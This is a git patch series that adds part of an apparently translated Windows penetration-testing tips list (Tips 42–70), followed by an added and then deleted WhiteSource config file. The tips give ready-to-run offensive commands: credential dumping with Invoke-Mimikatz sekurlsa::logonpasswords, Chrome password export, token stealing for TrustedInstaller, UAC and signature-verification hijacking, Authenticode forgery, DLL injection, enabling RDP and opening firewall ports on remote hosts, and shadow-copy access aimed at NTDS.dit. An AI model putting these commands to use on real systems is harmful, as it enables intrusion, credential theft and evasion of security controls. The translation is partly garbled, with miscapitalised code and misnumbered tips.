+The project name should correspond to the name specified by namespace. If it does not correspond, it can be modified in the project-attribute-assembly name. Otherwise, the generated dll cannot be used.
+
+Use csc.exe:
+
+Eg.
+
+```
+Using System;
+Using System.Diagnostics;
+
+Namespace TestDotNet
+{
+   Public class Class1
+   {
+      Static Class1()
+      {
+         Process.Start("cmd.exe");
+         Environment.Exit(0);
+      }
+   }
+}
+```
+Save it as TestDotNet.cs and just use csc.exe to generate it:
+
+`C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library TestDotNet.cs`
+
+If saved as a.cs, ​​then you need to add /out parameter to specify the output file as TestDotNet.dll, so the assembly name is also defaulted to TestDotNet (corresponding to the same code), otherwise, although the dll can be loaded, but can not be executed, the parameters are as follows :
+
+`C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library /out:TestDotNet.dll a.cs`
+
+---
+
+### Tips 43 Port problem with net use remote connection
+
+Use net use remote connection, if the target is enabled with NetBIOS over TCP/IP, then:
+
+1. The target opens both ports 139 and 445, and the system preferentially uses port 445.
+2. Target disables port 445 and can connect using port 139
+
+Target If NetBIOS over TCP/IP is disabled, then:
+
+1. Target disables port 445 and cannot connect
+
+---
+
+### Tips 44 Get TrustedInstaller Permissions
+
+Start the service TrustedInstaller and get the TrustedInstaller permission through Token replication.
+
+Common methods:
+
+- SelectMyParent
+- Invoke-TokenManipulation.ps1
+- incognito
+
+reference:
+
+ [Infiltration Techniques - Token Stealing and Utilization] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7% A7-Token%E7%AA%83%E5%8F%96%E4%B8%8E%E5%88%A9%E7%94%A8/)
+
+---
+
+### Tips 45 3389 Remote Connection
+
+#### 1. Query whether the system allows 3389 remote connection:
+
+`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections`
+
+1 means closed, 0 means open
+
+View the port of the remote connection:
+
+`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber`
+
+#### 2, the method of opening 3389 remote connection
+
+Method 1: Pass cmd
+
+```
+REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
+REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
+```
+
+Method 2: Pass the reg file
+
+The content is as follows:
+
+```
+Windows Registry Editor Version 5.00
+[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+"fDenyTSConnections"=dword:00000000
+[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
+"PortNumber"=dword:00000d3d
+```
+
+Import the registry:
+
+`regedit /s a.reg`
+
+**Note:**
+
+Modify the connection port to take effect after restarting
+
+**supplement**
+
+If the system has not been configured with Remote Desktop Services, you will need to add a firewall rule when you first open it, allowing port 3389. The command is as follows:
+
+`netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow`
+
+#### 3, remote connection method
+
+Kali uses 3389 remote connection:
+
+`rdesktop 192.168.1.1:3389`
+
+Windows:
+
+`mstsc.exe`
+
+Non-server version of Windows, only one account is allowed to log in by default
+
+The specific performance is:
+
+When logging in remotely, using the same account as the original system, the original system will be switched to the login interface.
+
+Using a different account, the original system desktop will prompt you to disconnect the current connection (default selection after 30 seconds)
+
+**Solution:**
+
+Use mimikatz.exe to execute `ts::multirdp` to allow multiple users to log in remotely
+
+The ability to achieve remote login of different accounts does not conflict, the original system desktop will not prompt the box
+
+Of course, using the same account as the original system, the original system will still be switched to the login interface.
+
+**Note:**
+
+This method fails after the system restarts. The next time you use it, you need to re-execute the command `ts::multirdp`.
+
+Can also be permanently modified by modifying the file termsrv.dll
+
+reference:
+
+["Infiltration Techniques - Multi-User Login for Windows System Remote Desktop"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A% 80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E7%9A% 84%E5%A4%9A%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95/)
+
+---
+
+### Tips 46 Using netsh to modify firewall rules for remote systems
+
+The remote system needs to allow the Windows Firewall to remotely manage. The open command is as follows:
+
+Netsh advfirewall set currentprofile settings remotemanagement enable
+
+Eg.
+
+```
+Netsh -r 192.168.0.2 -u TEST\administrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow
+```
+
+reference:
+
+["Domain Penetration - Using DCOM to Execute Programs in Remote Systems"] (https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F -%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7% E8%A1%8C%E7%A8%8B%E5%BA%8F/)
+
+---
+
+### Tips 47 Hijacking UAC
+
+When the UAC prompt box is popped up, execute arbitrary code, and insert the payload by modifying the function of the registry hijacking signature verification.
+
+reference:
+
+[Authenticode Signature Forgery - Signature Forgery and Signature Verification Hijacking of PE Files] (https://3gstudent.github.io/3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4 %BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9 %80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81/)
+
+---
+
+### Tips 48 Authenticode signature forgery of PE files
+
+By modifying the registry, you can add a Microsoft certificate to the PE file.
+
+reference:
+
+[Authenticode Signature Forgery - Signature Forgery and Signature Verification Hijacking of PE Files] (https://3gstudent.github.io/3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4 %BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9 %80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81/)
+
+["Authenticode Signature Forgery - Signature Forgery for File Types"] (https://3gstudent.github.io/3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC% AA%E9%80%A0-%E9%92%88%E5%AF%B9%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%E7%9A%84 %E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0/)
+
+---
+
+### Tips 49 Catalog signature forgery of PE files
+
+Construct Long UNC file name, implement file name spoofing, get Catalog signature
+
+reference:
+
+[Catalog Signature Forgery - Long UNC Filename Deception] (https://3gstudent.github.io/3gstudent.github.io/Catalog%E7%AD%BE%E5%90%8D%E4%BC%AA %E9%80%A0-Long-UNC%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97/)
+
+---
+
+### Tips 50 mklink
+
+Used to create symbolic links, which can be understood as shortcuts
+
+Create the directory c:\test\1, point to c:\temp, and use the following actions:
+
+(1) Create a link with the /D parameter command:
+
+Mklink /D "c:\test\1" "c:\Temp"
+
+(2) Create a join using the /J parameter command:
+
+Mklink /J "c:\test\1" "c:\Temp"
+
+difference：
+
+The link created with the /D parameter has more "file shortcuts" for file attributes.
+
+Use /J does not require administrator privileges
+
+Use /D requires administrator privileges
+
+**application:**
+
+Change the path to the released file
+
+---
+
+### Tips 51 powershell passes parameters when executing scripts
+
+```
+Powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCerts"
+
+Powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ""log ""privilege::debug"" ""sekurlsa::logonpasswords"""""
+```
+
+---
+
+### Tips 52 dll injection method
+
+#### 1, APC
+
+reference:
+
+["Dll injection through APC - bypassing Sysmon monitoring"] (https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E %E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7/)
+
+#### 2, process hollowing
+
+reference:
+
+["Implementation and Testing of the Process"] (https://3gstudent.github.io/3gstudent.github.io/%E5%82%80%E5%84%A1%E8%BF%9B%E7%A8% 8B%E7%9A%84%E5%AE%9E%E7%8E%B0%E4%B8%8E%E6%A3%80%E6%B5%8B/)
+
+#### 3, Process Doppelgänging
+
+reference:
+
+["Introduction to Process Doppelganging"] (https://3gstudent.github.io/3gstudent.github.io/Process-Doppelganging%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB %8D/)
+
+---
+
+### Tips 53 Default shared directory in the domain
+
+```
+\\<DOMAIN>\SYSVOL\<DOMAIN>\
+```
+
+All hosts in the domain can access, which saves group policy related data, including login script configuration files, etc.
+
+reference:
+
+["Domain Penetration - Using SYSVOL to Restore Passwords Saved in Group Policy"] (https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80 %8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8% AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/)
+
+---
+
+### Tips 54 Your TeamViewer may be backed up
+
+If your TeamViewer version is `13.0.5058`, don't feel free to connect to an unknown TeamViewer server, it may be backed up.
+
+reference:
+
+["Privacy Vulnerability Test in TeamViewer 13.0.5058"] (https://3gstudent.github.io/3gstudent.github.io/TeamViewer-13.0.5058%E4%B8%AD%E7%9A%84%E6% 9D%83%E9%99%90%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/)
+
+---
+
+### Tips 55 Remotely view domain-related login and logout related logs:
+
+#### method 1:
+
+```
+Wevtutil qe security /rd:true /f:text /q:"*[system/eventid=4624 and 4623 and 4672]" /r:dc1 /u:administrator /p:password
+```
+
+#### Method 2:
+
+(Not recommended, direct download file is too large)
+
+Obtain the domain control file: `C:\Windows\System32\winevt\Logs\Security.evtx`, filter event 4624/4623/4672
+
+---
+
+### Tips 56 Determine if the current system is in standby mode.
+
+The function return value of GetForegroundWindow() in the lock screen state is NULL, and the return value of GetForegroundWindow() function in non-lock screen state is a non-zero value.
+
+reference:
+
+Https://stackoverflow.com/questions/9563549/what-happens-behind-the-windows-lock-screen
+
+Powershell script implementation:
+
+https://github.com/3gstudent/Writeup/blob/master/CheckStandby.ps1
+
+---
+
+### Tips 57 Get the current system user no input time
+
+Judge through API GetIdleTime
+
+c# implementation:
+
+https://www.codeproject.com/Articles/13384/Getting-the-user-idle-time-with-C
+
+Powershell script implementation:
+
+https://github.com/3gstudent/Writeup/blob/master/GetIdleTime.ps1
+
+---
+
+### Tips 58 Determine the screen saver startup time of the current system
+
+Determine whether to open the screen saver:
+
+Find the registry `HKEY_CURRENT_USER\Control Panel\Desktop`, if there is a key value `SCRNSAVE.EXE`
+
+```
+REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE
+```
+
+If the screen saver is turned on, check the key value `ScreenSaveTimeOut` to get the screen saver startup time (in seconds).
+
+```
+REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut
+```
+
+---
+
+### Tips 59 Hide the interface of the specified process
+
+Change window state via API ShowWindowAsync
+
+Through powershell implementation, the script can refer to:
+
+https://github.com/3gstudent/Writeup/blob/master/HiddenProcess.ps1
+
+---
+
+### Tips 60 Screen capture of Windows system via Powershell
+
+Script download address:
+
+https://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8/file/50729/1/Take-ScreenShot.ps1
+
+---
+
+### Tips 61 View the programs currently installed on Windows systems
+
+Obtained by enumerating the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
+
+**Note:**
+
+The directory of the 32-bit program under the 64-bit system is `HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall`
+
+The reference address of the powershell script implementation:
+
+https://github.com/3gstudent/ListInstalledPrograms
+
+---
+
+### Tips 62 Get the current system type via wmi
+
+```
+wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_ComputerSystem get PCSystemType /FORMAT:list
+```
+
+|Value|Meaning|
+| - | - |
+|0 (0x0) |Unspecified|
+|1 (0x1) |Desktop|
+|2 (0x2) |Mobile|
+|3 (0x3) |Workstation|
+|4 (0x4) |Enterprise Server|
+|5 (0x5) |Small Office and Home Office (SOHO) Server|
+|6 (0x6) |Appliance PC|
+|7 (0x7) |Performance Server|
+|8 (0x8) |Maximum|
+
+
+
+---
+
+### Tips 63 Export the password saved by the Chrome browser:
+
+#### 1, online access
+
+method 1:
+
+Read the database file `%LocalAppData%\Google\Chrome\User Data\Default\Login Data`. If the Chrome browser is running and cannot be read directly, you need to copy it first.
+
+Direct decryption in the current system call API CryptUnprotectData
+
+Method 2:
+
+Mimikatz
+
+```
+Vault::cred
+```
+reference:
+
+["Infiltration Techniques - Exporting Passwords Saved in Chrome"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A% 80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D %E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/)
+
+#### 2, offline access
+
+You do not need to obtain the user's plain text password when using the Master Key.
+
+reference:
+
+["Infiltration Techniques - Using Masterkey to Export Passwords Stored in Chrome Browser"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6 %8A%80%E5%B7%A7-%E5%88%A9%E7%94%A8Masterkey%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6% B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0% 81/)
+
+
+---
+
+### Tips 65 Get the history file of the system through ShadowCopy
+
+Query whether the current system has a snapshot:
+
+```
+Vssadmin list shadows
+```
+
+Access the files in the history snapshot:
+
+```
+Mklink /d c:\testvsc \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy15\
+Dir c:\testvsc
+```
+
+reference:
+
+["Domain Penetration - Obtain NTDS.dit File for Domain Control Server"] (https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80 %8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A% 84NTDS.dit%E6%96%87%E4%BB%B6/)
+
+---
+
+### Tips 64 How to execute multiple commands on the command line
+
+```
+Aa && bb
+```
+
+Execute aa, and then execute bb after success.
+
+```
+Aa || bb
+```
+
+Execute aa first. If the execution is successful, bb is no longer executed. If it fails, bb is executed again.
+
+```
+Aa & bb
+```
+
+Execute aa first and then bb, regardless of whether aa is successful
+
+
+---
+
+### Tips 65 Sending mail via powershell (with attachments)
+
+Two methods, the code can refer to:
+
+https://github.com/3gstudent/SendMail-with-Attachments
+
+---
+
+### Tips 66 Get the remote desktop connection history of all users by reading the registry with powershell
+
+The default read registry can only get the registry information of the currently logged in user. You can get the registry configuration of the unlogged in user by loading the configuration unit with `reg load`.
+
+The code can refer to:
+
+https://github.com/3gstudent/ListInstalledPrograms
+
+reference:
+
+ [Infiltration Techniques - Obtaining Remote Desktop Connection History for Windows Systems] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A %80%E5%B7%A7-%E8%8E%B7%E5%BE%97Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E8%BF%9C%E7%A8% 8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95/ )
+
+---
+
+### Tips 67 Using pscp to upload files from Windows to Linux via the command line
+
+download link:
+
+Https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
+
+The upload command is as follows:
+
+```
+Pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
+```
+
+Will prompt whether to store the cache file
+
+Enter `Y`, create a new key in the registry: `HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys`, do not need to enter `Y` again for the next connection.
+
+Enter `N`, do not save the registry key
+
+Implement the method of automatically entering the `N` command:
+
+```
+Echo n |pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
+```
+
+---
+
+### Tips 68 Enumeration of Windows System Handles
+
+- On Windows 8 and later, NtQueryInformationProcess with ProcessHandleInformation is the most efficient method.
+- On Windows XP and later, NtQuerySystemInformation with SystemExtendedHandleInformation.
+- On Windows 7 and later, NtQuerySystemInformation with SystemHandleInformation can be used.
+
+Note:
+
+- WinXP and Win7, ObjectTypeNumber = 0x1c
+- Win8 and later, ObjectTypeNumber = 0x1e
+
+---
+
+### Tips 69 Windows command line uses rar compressed file
+
+Https://github.com/3gstudent/test/raw/master/rar.exe
+
+Maximum compression ratio:
+
+```
+Rar.exe a -m5 1.rar 1.txt
+```
+
+Volume compression, one compression package per 10MB：
+
+```
+rar.exe a -m5 -v10m 1.rar 1.txt
+```
+
+---
+
+### Tips 70
+

From 55a39a56d9cfe8c430cf7db7f1ab6561decde16f Mon Sep 17 00:00:00 2001
From: "whitesource-bolt-for-github[bot]"
 <whitesource-bolt-for-github[bot]@users.noreply.github.com>
Date: Thu, 23 May 2019 07:34:53 +0000
Subject: [PATCH 5/6] Initial WhiteSource configuration file

---
 .whitesource | 8 ++++++++
 1 file changed, 8 insertions(+)
 create mode 100644 .whitesource

diff --git a/.whitesource b/.whitesource
new file mode 100644
index 0000000..f056952
--- /dev/null
+++ b/.whitesource
@@ -0,0 +1,8 @@
+{
+  "generalSettings": {
+    "shouldScanRepo": true
+  },
+  "checkRunSettings": {
+    "vulnerableCheckRunConclusionLevel": "failure"
+  }
+}
\ No newline at end of file

From bf5060b7be0979ed1a3a0f1e8cdd6ef3c45f5d16 Mon Sep 17 00:00:00 2001
From: Pratik Raj <Rajpratik71@gmail.com>
Date: Thu, 11 Jul 2019 22:36:54 +0530
Subject: [PATCH 6/6] Delete .whitesource

---
 .whitesource | 8 --------
 1 file changed, 8 deletions(-)
 delete mode 100644 .whitesource

diff --git a/.whitesource b/.whitesource
deleted file mode 100644
index f056952..0000000
--- a/.whitesource
+++ /dev/null
@@ -1,8 +0,0 @@
-{
-  "generalSettings": {
-    "shouldScanRepo": true
-  },
-  "checkRunSettings": {
-    "vulnerableCheckRunConclusionLevel": "failure"
-  }
-}
\ No newline at end of file